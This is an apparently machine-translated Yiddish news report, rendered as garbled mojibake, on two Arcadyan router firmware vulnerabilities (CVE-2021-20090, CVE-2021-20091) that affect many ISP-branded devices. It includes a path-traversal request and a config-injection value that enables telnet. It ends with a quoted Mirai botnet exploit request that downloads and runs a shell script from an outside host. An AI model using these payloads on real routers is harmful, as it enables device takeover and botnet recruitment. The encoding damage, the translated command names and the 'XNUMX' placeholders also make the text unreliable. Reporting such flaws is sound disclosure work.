ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ ืื™ืŸ ื”ื™ื™ื ืจืึธื•ื˜ืขืจืก ื•ื•ืึธืก ื•ื•ื™ืจืงืŸ 17 ืžืึทื ื™ืึทืคืึทืงื˜ืฉืขืจืขืจื–

ื ืžืึทืกื™ื•ื• ื‘ืึทืคืึทืœืŸ ืื™ื– ืจืขืงืึธืจื“ืขื“ ืื•ื™ืฃ ื“ื™ ื ืขืฅ ืงืขื’ืŸ ื”ื™ื™ื ืจืึธื•ื˜ืขืจืก ื•ื•ืขืžืขื ืก ืคื™ืจืžื•ื•ืึทืจืข ื ื™ืฆื˜ ืึท ื”ื˜ื˜ืคึผ ืกืขืจื•ื•ืขืจ ื™ืžืคึผืœืึทืžืขื ื˜ื™ื™ืฉืึทืŸ ืคื•ืŸ ื“ื™ ืึทืจืงืึทื“ื™ืึทืŸ ืคื™ืจืžืข. ืฆื• ื‘ืึทืงื•ืžืขืŸ ืงืึธื ื˜ืจืึธืœ ืื™ื‘ืขืจ ื“ืขื•ื•ื™ืกืขืก, ืึท ืงืึธืžื‘ื™ื ืึทืฆื™ืข ืคื•ืŸ โ€‹โ€‹โ€‹โ€‹ืฆื•ื•ื™ื™ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ื– ืื™ื– ื’ืขื ื™ืฆื˜ ื•ื•ืึธืก ืึทืœืึทื•ื– ื•ื•ื™ื™ึทื˜ ื“ื•ืจื›ืคื™ืจื•ื ื’ ืคื•ืŸ ืึทืจื‘ื™ื˜ืจืึทืจื™ืฉ ืงืึธื“ ืžื™ื˜ ื•ื•ืึธืจืฆืœ ืจืขื›ื˜. ื“ืขืจ ืคึผืจืึธื‘ืœืขื ืึทืคืขืงืฅ ืึท ืคืขืจืœื™ ื‘ืจื™ื™ื˜ ืงื™ื™ื˜ ืคื•ืŸ ADSL ืจืึธื•ื˜ืขืจืก ืคื•ืŸ Arcadyan, ASUS ืื•ืŸ Buffalo, ื•ื•ื™ ื’ืขื–ื•ื ื˜ ื•ื•ื™ ื“ืขื•ื•ื™ืกืขืก ืกืึทืคึผืœื™ื™ื“ ืื•ื ื˜ืขืจ ื“ื™ ื‘ืขืขืœื™ื ืข ื‘ืจืึทื ื“ื– (ื“ื™ ืคึผืจืึธื‘ืœืขื ืื™ื– ื‘ืืฉื˜ืขื˜ื™ืงื˜ ืื™ืŸ Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ืื•ืŸ ืื ื“ืขืจืข ื˜ืขืœืขืงืึธื ืึธืคึผืขืจื™ื™ื˜ืขืจื–. ืขืก ืื™ื– ื‘ืืžืขืจืงื˜ ืึทื– ื“ื™ ืคึผืจืึธื‘ืœืขื ืื™ื– ื’ืขื•ื•ืขืŸ ืคืึธืจืฉื˜ืขืœืŸ ืื™ืŸ ืึทืจืงืึทื“ื™ืึทืŸ ืคื™ืจืžื•ื•ืึทืจืข ืคึฟืึทืจ ืžืขืจ ื•ื•ื™ 10 ื™ืึธืจ ืื•ืŸ ื‘ืขืฉืึทืก ื“ืขื ืžืึธืœ ืื™ื– ื’ืขืจืื˜ืŸ ืฆื• ืžื™ื™ื’ืจื™ื™ื˜ ืฆื• ื‘ื™ื™ึท ืžื™ื ื“ืกื˜ืขืจ 20 ืžื™ื˜ืœ ืžืึธื“ืขืœืก ืคื•ืŸ 17 ืคืึทืจืฉื™ื“ืขื ืข ืžืึทื ื™ืึทืคืึทืงื˜ืฉืขืจืขืจื–.

ื“ืขืจ ืขืจืฉื˜ืขืจ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™, CVE-2021-20090, ืžืื›ื˜ ืขืก ืžืขื’ืœืขืš ืฆื• ืึทืงืกืขืก ืงื™ื™ืŸ ื•ื•ืขื‘ ืฆื•ื‘ื™ื ื“ ืฉืจื™ืคื˜ ืึธืŸ ืึธื˜ืขื ื˜ืึทืงื™ื™ืฉืึทืŸ. ื“ื™ ืขืกืึทื ืก ืคื•ืŸ ื“ื™ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ ืื™ื– ืึทื– ืื™ืŸ ื“ื™ ื•ื•ืขื‘ ืฆื•ื‘ื™ื ื“, ืขื˜ืœืขื›ืข ื“ื™ืจืขืงื˜ืขืจื™ื– ื“ื•ืจืš ื•ื•ืึธืก ื‘ื™ืœื“ืขืจ, CSS ื˜ืขืงืขืก ืื•ืŸ ื“ื–ืฉืึทื•ื•ืึทืกืงืจื™ืคึผื˜ ืกืงืจื™ืคึผืก ื–ืขื ืขืŸ ื’ืขืฉื™ืงื˜ ื–ืขื ืขืŸ ืฆื•ื˜ืจื™ื˜ืœืขืš ืึธืŸ ืึธื˜ืขื ื˜ืึทืงื™ื™ืฉืึทืŸ. ืื™ืŸ ื“ืขื ืคืึทืœ, ื“ื™ืจืขืงื˜ืขืจื™ื– ืคึฟืึทืจ ื•ื•ืึธืก ืึทืงืกืขืก ืึธืŸ ืึธื˜ืขื ื˜ืึทืงื™ื™ืฉืึทืŸ ืื™ื– ืขืจืœื•ื™ื‘ื˜ ื–ืขื ืขืŸ ืึธืคึผื’ืขืฉื˜ืขืœื˜ ืžื™ื˜ ื“ื™ ืขืจืฉื˜ ืžืึทืกืงืข. ืกืคึผืขืฆื™ืคื™ืฆื™ืจืŸ "../" ืื•ืชื™ื•ืช ืื™ืŸ ืคึผืึทื˜ืก ืฆื• ื’ื™ื™ืŸ ืฆื• ื“ื™ ืคืึธื˜ืขืจ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ ืื™ื– ืืคื’ืขืฉื˜ืขืœื˜ ื“ื•ืจืš ื“ื™ ืคื™ืจืžื•ื•ืึทืจืข, ืึธื‘ืขืจ ื ื™ืฆืŸ ื“ื™ "..% 2f" ืงืึธืžื‘ื™ื ืึทืฆื™ืข ืื™ื– ืกืงื™ืคึผื˜. ืื–ื•ื™, ืขืก ืื™ื– ืžืขื’ืœืขืš ืฆื• ืขืคืขื ืขืŸ ืคึผืจืึธื˜ืขืงื˜ืขื“ ื‘ืœืขื˜ืขืจ ื•ื•ืขืŸ ืฉื™ืงื˜ ืจื™ืงื•ื•ืขืก ื•ื•ื™ "http://192.168.1.1/images/..%2findex.htm".

ื“ื™ ืฆื•ื•ื™ื™ื˜ืข ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™, CVE-2021-20091, ืึทืœืึทื•ื– ืึทืŸ ืึธื˜ืขื ื˜ืึทืงื™ื™ื˜ืึทื“ ื‘ืึทื ื™ืฆืขืจ ืฆื• ืžืึทื›ืŸ ืขื ื“ืขืจื•ื ื’ืขืŸ ืฆื• ื“ื™ ืกื™ืกื˜ืขื ืกืขื˜ื˜ื™ื ื’ืก ืคื•ืŸ ื“ื™ ืžื™ื˜ืœ ื“ื•ืจืš ืฉื™ืงืŸ ืกืคึผืขืฆื™ืขืœ ืคืึธืจืžืึทื˜ื˜ืขื“ ืคึผืึทืจืึทืžืขื˜ืขืจืก ืฆื• ื“ื™ application_abstract.cgi ืฉืจื™ืคื˜, ื•ื•ืึธืก ืงืขืŸ ื ื™ืฉื˜ ืงืึธื ื˜ืจืึธืœื™ืจืŸ ื“ื™ ื‘ื™ื™ึทื–ื™ื™ึทืŸ ืคื•ืŸ ืึท ื ื™ื™ึท-ืœื™ื ืข ื›ืึทืจืึทืงื˜ืขืจ ืื™ืŸ ื“ื™ ืคึผืึทืจืึทืžืขื˜ืขืจืก. . ืคึฟืึทืจ ื‘ื™ื™ึทืฉืคึผื™ืœ, ื•ื•ืขืŸ ืคึผืขืจืคืึธืจืžื™ื ื’ ืึท ืคึผื™ื ื’ ืึธืคึผืขืจืึทืฆื™ืข, ืึท ืึทื˜ืึทืงืขืจ ืงืขื ืขืŸ ืกืคึผืขืฆื™ืคื™ืฆื™ืจืŸ ื“ื™ ื•ื•ืขืจื˜ "192.168.1.2% 0AARC_SYS_TelnetdEnable = 1" ืื™ืŸ ื“ืขื ืคืขืœื“ ืžื™ื˜ ื“ื™ IP ืึทื“ืจืขืก ื•ื•ืึธืก ืื™ื– ืึธืคึผื’ืขืฉื˜ืขืœื˜, ืื•ืŸ ื“ื™ ืฉืจื™ืคื˜, ื•ื•ืขืŸ ืงืจื™ื™ื™ื˜ื™ื ื’ ื“ื™ ืกืขื˜ื˜ื™ื ื’ืก ื˜ืขืงืข /tmp/etc/config/ .glbcfg, ื•ื•ืขื˜ ืฉืจื™ื™ึทื‘ืŸ ื“ื™ ืฉื•ืจื” "AARC_SYS_TelnetdEnable=1" ืื™ืŸ ืขืก ", ื•ื•ืึธืก ืึทืงื˜ืึทื•ื•ื™ื™ืฅ ื“ื™ ื˜ืขืœื ืขื˜ื“ ืกืขืจื•ื•ืขืจ, ื•ื•ืึธืก ื’ื™ื˜ ืึทื ืจื™ืกื˜ืจื™ืงื˜ื™ื“ ื‘ืึทืคึฟืขืœืŸ ืฉืึธืœ ืึทืงืกืขืก ืžื™ื˜ ื•ื•ืึธืจืฆืœ ืจืขื›ื˜. ืกื™ืžื™ืœืึทืจืœื™, ื“ื•ืจืš ื‘ืึทืฉื˜ืขื˜ื™ืงืŸ ื“ื™ AARC_SYS ืคึผืึทืจืึทืžืขื˜ืขืจ, ืื™ืจ ืงืขื ืขืŸ ื•ื™ืกืคื™ืจืŸ ืงื™ื™ืŸ ืงืึธื“ ืื•ื™ืฃ ื“ื™ ืกื™ืกื˜ืขื. ื“ืขืจ ืขืจืฉื˜ืขืจ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ ืžืื›ื˜ ืขืก ืžืขื’ืœืขืš ืฆื• ืœื•ื™ืคืŸ ืึท ืคึผืจืึธื‘ืœืขืžืึทื˜ื™ืง ืฉืจื™ืคื˜ ืึธืŸ ืึธื˜ืขื ื˜ืึทืงื™ื™ืฉืึทืŸ ื“ื•ืจืš ืึทืงืกืขืก ืขืก ื•ื•ื™ "/images/..%2fapply_abstract.cgi".

ืฆื• ื’ื•ื•ื•ืจืข ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ื–, ืึท ืึทื˜ืึทืงืขืจ ืžื•ื–ืŸ ืงืขื ืขืŸ ืฆื• ืฉื™ืงืŸ ืึท ื‘ืงืฉื” ืฆื• ื“ื™ ื ืขืฅ ืคึผืึธืจื˜ ืื•ื™ืฃ ื•ื•ืึธืก ื“ื™ ื•ื•ืขื‘ ืฆื•ื‘ื™ื ื“ ืื™ื– ืคืœื™ืกื ื“ื™ืง. ืื•ื™ื‘ ืžืฉืคื˜ืŸ ืœื•ื™ื˜ ื“ื™ ื“ื™ื ืึทืžื™ืง ืคื•ืŸ ื“ื™ ืคืึทืจืฉืคึผืจื™ื™ื˜ืŸ ืคื•ืŸ ื“ื™ ื‘ืึทืคืึทืœืŸ, ืคื™ืœืข ืึธืคึผืขืจื™ื™ื˜ืขืจื– ืœืึธื–ืŸ ืึทืงืกืขืก ืื•ื™ืฃ ื–ื™ื™ืขืจ ื“ืขื•ื•ื™ืกืขืก ืคึฟื•ืŸ ื“ื™ ืคื•ื ื“ืจื•ื™ืกื ื“ื™ืง ื ืขืฅ ืฆื• ืคืึทืจืคึผืึธืฉืขื˜ืขืจืŸ ื“ื™ ื“ื™ืึทื’ื ืึธืกื™ืก ืคื•ืŸ ืคึผืจืึธื‘ืœืขืžืก ื“ื•ืจืš ื“ื™ ืฉื˜ื™ืฆืŸ ื“ื™ื ืกื˜. ืื•ื™ื‘ ืึทืงืกืขืก ืฆื• ื“ื™ ืฆื•ื‘ื™ื ื“ ืื™ื– ืœื™ืžื™ื˜ืขื“ ื‘ืœื•ื™ื– ืฆื• ื“ื™ ื™ื ืขืจืœืขืš ื ืขืฅ, ืึท ื‘ืึทืคืึทืœืŸ ืงืขื ืขืŸ ื–ื™ื™ืŸ ื“ื•ืจื›ื’ืขืงืึธื›ื˜ ืคึฟื•ืŸ ืึท ืคื•ื ื“ืจื•ื™ืกื ื“ื™ืง ื ืขืฅ ืžื™ื˜ ื“ื™ "ื“ื ืก ืจื™ื‘ื™ื ื“ื™ื ื’" ื˜ืขื›ื ื™ืง. ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ื– ื–ืขื ืขืŸ ืฉื•ื™ืŸ ืึทืงื˜ื™ื•ื•ืœื™ ื’ืขื ื™ืฆื˜ ืฆื• ืคืึทืจื‘ื™ื ื“ืŸ ืจืึธื•ื˜ืขืจืก ืฆื• ื“ื™ Mirai botnet: POST /images/..%2fapply_abstract.cgi ื”ื˜ื˜ืคึผ/1.1 ืงืึทื ืขืงืฉืึทืŸ: ื ืึธืขื ื˜ ื‘ืึทื ื™ืฆืขืจ-ืึทื’ืขื ื˜: ื“ืึทืจืง action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; ืงืขืจืœ+-ืึธ+ื”ื˜ื˜ืคึผ://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

ืžืงื•ืจ: opennet.ru

ืœื™ื™ื’ืŸ ืึท ื‘ืึทืžืขืจืงื•ื ื’